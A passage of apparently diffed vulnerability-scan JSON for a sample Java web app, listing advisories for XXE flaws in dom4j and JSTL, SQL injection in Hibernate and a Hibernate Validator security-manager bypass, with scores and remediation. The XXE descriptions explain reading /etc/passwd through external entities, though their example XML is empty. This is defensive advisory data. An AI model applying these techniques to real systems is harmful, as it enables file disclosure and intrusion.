"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.900402Z" + } + ], + "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection due to improper validation of the `QName` inputs.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387)\n- [GitHub Issue](https://github.com/dom4j/dom4j/issues/48)\n- [POC: Ihacktoprotect Blog](https://ihacktoprotect.com/post/dom4j-xml-injection/)\n", + "epssDetails": { + "percentile": "0.70906", + "probability": "0.00325", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-1000632" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-6pcc-3rfx-4gpm" + ] + }, + "packageName": "dom4j:dom4j", + "proprietary": false, + "creationTime": "2019-04-10T16:07:04.634619Z", + "functions_new": [ + { + "version": [ + "[0,]" + ], + "functionId": { + "className": "org.dom4j.Namespace", + "functionName": "" + } + }, + { + "version": [ + "[0,]" + ], + "functionId": { + "className": "org.dom4j.QName", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-01T19:12:29Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "dom4j", + "artifactId": "dom4j" + }, + "publicationTime": "2018-08-21T14:16:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.900402Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "dom4j:dom4j@1.6.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "dom4j:dom4j", + "version": "1.6.1", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-DOM4J-2812975", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.4, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "dom4j:dom4j", + "references": [ + { + "url": "https://github.com/dom4j/dom4j/commit/a822852", + "title": "GitHub Commit" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:50:18.813214Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:53:57.985080Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:31.083245Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.813214Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:57.985080Z" + } + ], + "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. By using the default `SaxReader()` provided by Dom4J, external DTDs and External Entities are allowed, resulting in a possible XXE.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/a822852)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1694235)\n", + "epssDetails": { + "percentile": "0.79800", + "probability": "0.00664", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10683" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-hwj3-m3p6-hj38" + ] + }, + "packageName": "dom4j:dom4j", + "proprietary": false, + "creationTime": "2022-05-10T12:56:27.582369Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2020-04-15T09:38:17Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "dom4j", + "artifactId": "dom4j" + }, + "publicationTime": "2020-04-16T15:22:50Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.985080Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "dom4j:dom4j@1.6.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "dom4j:dom4j", + "version": "1.6.1", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-JAVAXSERVLET-30449", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "credit": [ + "David Jorm" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "javax.servlet:jstl", + "references": [ + { + "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E", + "title": "Apache Mail Archive" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254", + "title": "NVD" + }, + { + "url": "https://access.redhat.com/security/cve/CVE-2015-0254", + "title": "RedHat CVE Database" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:45:52.623697Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", + "cvssV3BaseScore": 7.6, + "modificationTime": "2024-03-11T09:53:48.017447Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:43.270072Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:45:52.623697Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.6, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:48.017447Z" + } + ], + "description": "## Overview\n[javax.servlet:jstl](https://mvnrepository.com/artifact/javax.servlet/jstl) is a collection of useful JSP tags which encapsulates the core functionality common to many JSP applications.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. Apache Standard Taglibs before 1.2.3 allows remote attackers to execute arbitrary code or conduct external XML entity (XXE) attacks via a crafted XSLT extension in a `` or `` JSTL XML tag.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `javax.servlet:jstl`.\n\n## References\n- [Apache Mail Archive](http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254)\n- [RedHat CVE Database](https://access.redhat.com/security/cve/CVE-2015-0254)\n", + "epssDetails": { + "percentile": "0.94002", + "probability": "0.07046", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-0254" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-6x4w-8w53-xrvv" + ] + }, + "packageName": "javax.servlet:jstl", + "proprietary": false, + "creationTime": "2017-02-22T07:28:19.341000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-02-27T16:13:27Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "javax.servlet", + "artifactId": "jstl" + }, + "publicationTime": "2015-02-27T16:51:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:48.017447Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "javax.servlet:jstl@1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "javax.servlet:jstl", + "version": "1.2", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-1041788", + "title": "SQL Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,5.4.24.Final)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "5.4.24.Final" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.2, + "functions": [ + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/loader/plan/exec/query/internal/SelectStatementBuilder.java", + "className": "SelectStatementBuilder", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Delete.java", + "className": "Delete", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Insert.java", + "className": "Insert", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/InsertSelect.java", + "className": "InsertSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/QuerySelect.java", + "className": "QuerySelect", + "functionName": "toQueryString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Select.java", + "className": "Select", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/SimpleSelect.java", + "className": "SimpleSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Update.java", + "className": "Update", + "functionName": "toStatementString" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-core", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78", + "title": "GitHub Commit" + }, + { + "url": "https://access.redhat.com/security/cve/cve-2020-25638", + "title": "Redhat CVE Details" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:50:47.602540Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:53:47.086548Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.2, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:14.190706Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.602540Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.086548Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SQL comments of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. The highest threat from this vulnerability is to data confidentiality and integrity.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.4.24.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78)\n- [Redhat CVE Details](https://access.redhat.com/security/cve/cve-2020-25638)\n", + "epssDetails": { + "percentile": "0.72103", + "probability": "0.00352", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-25638" + ], + "CWE": [ + "CWE-89" + ] + }, + "packageName": "org.hibernate:hibernate-core", + "proprietary": false, + "creationTime": "2020-11-19T16:51:52.251545Z", + "functions_new": [ + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.loader.plan.exec.query.internal.SelectStatementBuilder", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Delete", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Insert", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.InsertSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.QuerySelect", + "functionName": "toQueryString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Select", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.SimpleSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Update", + "functionName": "toStatementString" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-11-19T16:51:45Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-core" + }, + "publicationTime": "2020-11-19T16:57:14.572204Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.086548Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-584563", + "title": "SQL Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Gail Badner" + ], + "semver": { + "vulnerable": [ + "[,5.3.18.Final)", + "[5.4.0.Final, 5.4.18.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.3.18.Final", + "5.4.18.Final" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[5.1.18.Final ,5.4.18.Final)" + ], + "functionId": { + "filePath": "org/hibernate/query/criteria/internal/expression/LiteralExpression.java", + "className": "LiteralExpression", + "functionName": "renderProjection" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-core", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-orm/pull/3438", + "title": "GitHub Pull Request" + }, + { + "url": "https://hibernate.atlassian.net/browse/HHH-14077", + "title": "Jira Ticket" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:51:28.265729Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:49.262550Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:47.723462Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:28.265729Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:49.262550Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SELECT or GROUP BY parts of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.3.18.Final, 5.4.18.Final or higher.\n## References\n- [GitHub Pull Request](https://github.com/hibernate/hibernate-orm/pull/3438)\n- [Jira Ticket](https://hibernate.atlassian.net/browse/HHH-14077)\n", + "epssDetails": { + "percentile": "0.42797", + "probability": "0.00104", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14900" + ], + "CWE": [ + "CWE-89" + ] + }, + "packageName": "org.hibernate:hibernate-core", + "proprietary": false, + "creationTime": "2020-07-15T13:53:15.331818Z", + "functions_new": [ + { + "version": [ + "[5.1.18.Final ,5.4.18.Final)" + ], + "functionId": { + "className": "org.hibernate.query.criteria.internal.expression.LiteralExpression", + "functionName": "renderProjection" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-18T13:46:30Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-core" + }, + "publicationTime": "2020-07-15T16:40:12Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.262550Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-30098", + "title": "JSM bypass via ReflectionHelper", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[4.1.0.Beta1, 4.3.2.Final)", + "[5.0.0.Final,5.1.2.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "4.3.2.Final", + "5.1.2.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-validator", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e", + "title": "GitHub Commit" + }, + { + "url": "https://hibernate.atlassian.net/browse/HV-912", + "title": "Jira Issue" + }, + { + "url": "https://bugzilla.redhat.com/CVE-2014-3558", + "title": "Redhat Bugzilla" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:09.119807Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", + "cvssV3BaseScore": 4.4, + "modificationTime": "2024-03-11T09:48:45.778673Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:48.734535Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:46:09.119807Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:45.778673Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to JSM bypass via ReflectionHelper. ReflectionHelper (`org.hibernate.validator.util.ReflectionHelper`) in Hibernate Validator 4.1.0 before 4.2.1, 4.3.x before 4.3.2, and 5.x before 5.1.2 allows attackers to bypass Java Security Manager (JSM) restrictions and execute restricted reflection calls via a crafted application.\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 4.3.2.Final, 5.1.2.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c)\n- [GitHub 